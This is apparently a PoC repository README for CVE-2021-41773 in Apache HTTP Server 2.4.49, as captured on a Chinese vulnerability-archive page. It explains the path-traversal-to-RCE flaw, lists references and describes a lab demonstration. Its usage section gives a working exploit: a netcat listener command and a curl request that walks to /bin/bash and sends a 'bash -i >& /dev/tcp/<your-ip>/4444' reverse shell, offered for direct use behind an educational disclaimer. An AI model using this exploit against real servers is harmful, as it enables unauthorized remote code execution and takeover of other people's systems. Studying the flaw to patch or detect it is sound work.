来源

关联漏洞

介绍

# CVE-2021-41773 – Apache HTTP Server 2.4.49 Remote Code Execution

> ⚠️ **Disclaimer**  
This repository is intended **strictly for educational and research purposes only**.  
The information and code provided here can be used in **controlled environments**, such as private lab machines.  
**Unauthorized use of this code against systems you do not own or have explicit permission to test is illegal and unethical.**  
The author is **not responsible** for any misuse or damages caused.

---

## 🔍 About the Vulnerability

**CVE-2021-41773** affects **Apache HTTP Server version 2.4.49**.  
Due to improper input validation in path normalization, an attacker can exploit **path traversal** using encoded characters like `%2e` to access arbitrary files.  
If **CGI is enabled**, this vulnerability can be escalated to **unauthenticated remote code execution (RCE)**.

- **Vulnerability Type:** Path Traversal to Remote Code Execution  
- **Affected Version:** Apache 2.4.49  
- **Authentication Required:** ❌ No  
- **Severity:** Critical  
- **CVSS Score:** 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

---

## 🧾 References

- [Apache Security Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)  
- [Exploit-DB – 50383](https://www.exploit-db.com/exploits/50383)  
- [GitHub PoC](https://github.com/battleoverflow/apache-traversal)  
- [NVD CVE Report](https://nvd.nist.gov/vuln/detail/CVE-2021-41773)

---

## 🛠 Exploit Overview

A malicious `curl` request is crafted to exploit the path traversal flaw. When CGI is enabled, attackers can reach `/bin/bash` and run arbitrary shell commands.  
In this example, a **reverse shell payload** is sent to gain shell access from the server.

---

## 💥 Demonstration

This exploit was tested in a **private lab environment**. Below are the steps and outcomes.

### 1. Detecting Apache Version  
An Nmap scan identified the target running Apache/2.4.49.

![Apache Version](./img/apache-version.png)

---

### 2. Exploit Execution  
A reverse shell payload was delivered using a crafted curl command.

![Exploit Execution](./img/exploit-command.png)

---

### 3. Reverse Shell Received  
A reverse shell was successfully obtained on the attacker's listener.

![Reverse Shell](./img/reverse-shell.png)

---

## 📂 Exploit Usage

**Step 1: Start Netcat Listener**

```bash
nc -nvlp 4444
```

**Step 1: Run Exploit**

```bash
curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'
```

### ✔️ Ensure:

Apache version is 2.4.49

CGI is enabled

Port 4444 (or your chosen port) is open through the firewall

## 📖 Medium Blog

Check out the detailed walkthrough and theory on my Medium post:  
👉 [Read the blog on Medium](https://medium.com/cyberquestor/️-cve-2021-41773-exploiting-apache-2-4-49-path-traversal-to-remote-code-execution-rce-2ab23c5837cd)

文件快照

 [4.0K]  /data/pocs/4468d48464791ea8521e232fb178afed2b753507
├── [4.0K]  img
│   ├── [180K]  apache-version.png
│   ├── [222K]  exploit-command.png
│   └── [ 56K]  reverse-shell.png
└── [2.9K]  README.md

1 directory, 4 files

备注